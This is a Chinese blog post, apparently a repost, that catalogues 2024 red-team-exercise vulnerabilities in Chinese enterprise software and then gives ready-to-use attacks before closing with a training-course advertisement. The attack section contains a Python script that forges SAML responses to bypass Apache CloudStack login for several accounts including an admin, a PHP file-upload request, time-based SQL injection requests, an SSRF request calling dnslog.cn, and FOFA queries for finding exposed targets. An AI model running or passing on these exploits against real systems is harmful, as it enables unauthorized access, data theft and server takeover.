今天做漏洞情报收集时,找到一个不错的站,推荐给大家,网站地址:
http://kpanda.wiki/#/navbar/hw

7-25漏洞合集
2024-07-25
A36-1Apache-CloudStack-PermissionAC
C14-1创客13星-零售商城系统-任意文件上传
F26-1飞讯云–SQL
F27-1飞讯云-云WMS仓库管理系统-SQL
F5-5泛微-E-Mobile_移动管理平台-PermissionAC
F5-6泛微-E-Mobile_移动管理平台-SSRF
H40-1汇智-EDR-任意文件读取
J18-3建文-工程项目管理软件-SQL
J18-4建文-工程项目管理软件-SQL
K22-1科迅-一卡通管理系统-SQL
K22-2科迅-一卡通管理系统-SQL
K23-1开源-Bazarrswaggerui组件-任意文件读取
L12-2联软安渡-UniNXG安全数据交换系统-SQL
M3-2明源云-ERP系统接口管家-任意文件上传
W20-1WVP-视频平台-SQL
Y22-8用友-时空KSOA-SQL
Z16-1资管云–任意文件上传
7-24漏洞合集
2024-07-24
A35-1Apache-RocketMQ-InformationLeakage
D20-1DedeCMS-RCE
D20-2DedeCMS-RCE
F10-4孚盟云-CRM系统-SQL
F25-1帆软-前台-RCE
F6-10泛微-E-Cology-PermissionAC
F6-10泛微-E-Cology-SQL
F9-2帆软-OA-RCE
G4-6广联达-OA-PermissionAC
H14-10海康威视-iSecure_Center综合安防管理平台-RCE
H38-1H3C-Workspace云桌面-RCE
H39-1华磊-科技物流-SQL
K13-2科拓-全智能停车收费系统-任意文件上传
K20-1开源-fogproject系统-RCE
K21-1开源-1Panel面板-RCE
L13-1浪潮云-财务系统-RCE
L14-1蓝凌-EKP-RCE
M13-2迈普-多业务融合网关-InformationLeakage
Q13-1全息-AI网络运维平台-RCE
Q4-2启明星辰-天玥运维安全网关-SQL
Q5-2奇安信-VPN-RCE
R22-1润乾报表–任意文件上传
R23-1锐捷-NBS2026G-P交换机-PermissionAC
S37-1数字通指尖云平台-智慧政务payslip-SQL
T1-9通天星-CMSV6车载定位监控平台-SQL
T10-36通达-OA-SQL
T16-1通天星-主动安全监控云平台-RCE
T17-1ThinkPHP5-拼团零售商城系统-PermissionAC
T2-5天问-物业ERP系统-任意文件读取
W10-2WebLogic-RCE
W19-1微信公众平台-无限回调系统_-SQL
X8-4海洋-CMS-RCE
Y1-2用友-畅捷通CRM-任意文件上传
Y3-38用友-U8-Cloud-反序列化RCE
Y37-1亿赛通-数据泄露防护(DLP)系统-SQL
Y38-1用友-CRM客户关系管理系统-PermissionAC
Y4-89用友-NC-SQL
Y5-58亿赛通-电子文档安全管理系统-SQL
2024 HW必修高危漏洞合集 合集1
K15-1开源-YzmCMS-RCE
Y2-8用友-畅捷通T±RCE
P14-1PgAdmin-数据库-RCE
F8-16泛微-E-Office-RCE
R18-1锐捷-EWEB路由器-RCE
F8-14泛微-E-Office-文件上传
Y15-5用友-U8+CRM-文件上传
F8-17泛微-E-Office-任意文件上传
Y16-20用友-GRP-U8-反序列化RCE
Z4-5致远互联-OA-文件上传
Q1-4奇安信-网神SecSSL3600-文件上传
Q1-6奇安信-网神SecSSL3600-文件上传
A5-1安恒-下一代防火墙-RCE
J8-7金蝶-云星空-RCE
Y17-1用友-YonBIP-JNDI注入
J31-1金山-V8终端安全系统-RCE
W1-22万户-ezOffice-RCE
Q1-12奇安信-网神SecSSL3600-RCE
2024 HW必修高危漏洞合集 合集2
J16-4金蝶-EAS-任意文件上传
Y4-88用友-NC-反序列化RCE
Y16-21用友-GRP-U8-任意文件上传
P3-1Panalog-日志审计系统-RCE
P3-2Panalog-日志审计系统-RCE
P3-3Panalog-日志审计系统-RCE
Z3-2致远互联-M1移动协同办公管理软件-RCE
Y15-1用友-U8±文件上传
Y19-4用友-移动管理系统-文件上传
2-4360-360新天擎终端安全管理系统-文件上传
T10-18通达-OA-文件上传
H1-17宏景-人力资源管理-任意文件上传
F8-4泛微-E-Office-SQL
F5-3泛微-E-Mobile移动管理平台-文件上传
Y16-8用友-GRP-U8-文件上传
Y19-2用友-移动管理系统-SQL
A8-1AtlassianConfluence-RCE
A8-2AtlassianConfluence-RCE
A8-3AtlassianConfluence-RCE
F5-2泛微-E-Mobile-RCE
Y5-3亿赛通-电子文档安全管理系统-反序列化RCE
Y5-4亿赛通-电子文档安全管理系统-反序列化RCE
Y5-50亿赛通-电子文档安全管理系统-文件上传
A4-3安恒-明御安全网关-RCE
A5-1安恒-下一代防火墙-RCE
2024 HW必修高危漏洞合集 合集3
F8-18泛微-E-Office-RCE
F8-19泛微-E-Office-任意文件上传
J16-5金蝶-EAS-任意文件上传
K17-1开源-dedecms-任意文件上传
L5-4绿盟-SAS堡垒机-RCE
S2-2深信服-下一代防火墙-RCE
Y8-25用友-NCCloud-任意文件上传
Z4-6蓝凌-OA-RCE
S3-1深信服-应用交付AD-RCE
H13-3海康威视-iVMS-8700综合安防管理平台-文件上传
H13-4海康威视-iVMS-8700综合安防管理平台-文件上传
H13-6海康威视-iVMS-8700综合安防管理平台-RCE
H14-8海康威视-iSecureCenter综合安防管理平台-反序列化RCE
A4-1安恒-明御安全网关-RCE
A4-2安恒-明御安全网关-文件上传
A4-3安恒-明御安全网关-RCE
A4-4安恒-明御安全网关-文件上传
A5-1安恒-下一代防火墙-RCE
T10-32通达-OA-RCE
Y3-14用友-U8-Cloud-文件上传
1.1Apache-CloudStack-PermissionAC
1.1.1漏洞简介
Apache软件基金会发布了一则关于其开源云计算平台Apache CloudStack的严重漏洞(CVE-2024-41107)的安全公告。此漏洞影响安全断言标记语言(SAML)认证机制,可能允许攻击者绕过认证,获得对用户账户和资源的未授权访问。
1.1.2payload
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import xml.etree.ElementTree as ET
import base64
import logging
# Setup logging
logging.basicConfig(filename='exploit.log', level=logging.INFO, format='%(asctime)s - %(message)s')
# URL of the login endpoint
url = "http://target-cloudstack-instance.com/client/api"
# Function to generate dynamic SAML response
def generate_saml_response(username):
issue_instant = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ')
saml_response = f"""
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_8f0d8b57b7b34a1a8f0d8b57b7b34a1a" Version="2.0" IssueInstant="{issue_instant}" Destination="{url}">
<saml:Issuer>http://your-saml-issuer.com</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion Version="2.0" ID="_abc123" IssueInstant="{issue_instant}">
<saml:Issuer>http://your-saml-issuer.com</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">{username}</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="{not_on_or_after}" Recipient="{url}"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="{issue_instant}" NotOnOrAfter="{not_on_or_after}">
<saml:AudienceRestriction>
<saml:Audience>{url}</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="{issue_instant}" SessionIndex="_abc123">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
"""
return base64.b64encode(saml_response.encode('utf-8')).decode('utf-8')
# List of usernames to attempt access
usernames = ["user1@example.com", "user2@example.com", "admin@example.com"]
# Function to attempt login with SAML response
def attempt_login(saml_response):
data = {
"command": "samlSsoLogin",
"SAMLResponse": saml_response
}
response = requests.post(url, data=data)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
session_id = soup.find('sessionid')
if session_id:
logging.info(f"Login successful, session ID: {session_id.text}")
print(f"Login successful, session ID: {session_id.text}")
else:
logging.info("Login failed, no session ID found in response.")
print("Login failed, no session ID found in response.")
else:
logging.info(f"Login failed, status code: {response.status_code}")
print(f"Login failed, status code: {response.status_code}")
# Attempt login for each username
for username in usernames:
saml_response = generate_saml_response(username)
attempt_login(saml_response)
1.2创客13星-零售商城系统-任意文件上传
1.2.1资产收集
response:“/Public/Xin/static/css/iconfont.css”
1.2.2利用
需要有注册账号,网上有一些资产,用户系统不多。
1.poc代码
POST /Login/shangchuan HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/Login/shangchuan
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
2.效果图

1.3飞讯云–SQL
1.3.1payload
GET /MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN HTTP/1.1
Host: ip
1.4飞讯云-云WMS仓库管理系统-SQL
1.4.1漏洞简介
飞讯云-WMS /MyDown/MyImportData 接口处存在前台SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

1.4.2资产收集
fofa语法:
body=“wx8ccb75857bd3e985”

1.4.3 payload
GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1.5泛微-E-Mobile 移动管理平台-PermissionAC
泛微E-Mobile installOperate.do 接口处存在服务器请求伪造漏洞,未经身份验证的远程攻击者利用此漏洞扫描服务器所在的内网或本地端口,获取服务的banner信息,窥探网络结构,甚至对内网或本地运行的应用程序发起攻击,获取服务器内部敏感配置,造成信息泄露。
1.5.1payload
fofa语法:
header=“EMobileServer”
GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Copy to clipboardErrorCopied
效果图:

学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
网络安全学习路线&学习资源
网络安全的知识多而杂,怎么科学合理安排?
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!
初级网工
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。
8、超级网工
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。

网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。

一些我自己买的、其他平台白嫖不到的视频教程:

需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。
网络安全学习路线&学习资源
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!


被折叠的 条评论
为什么被折叠?



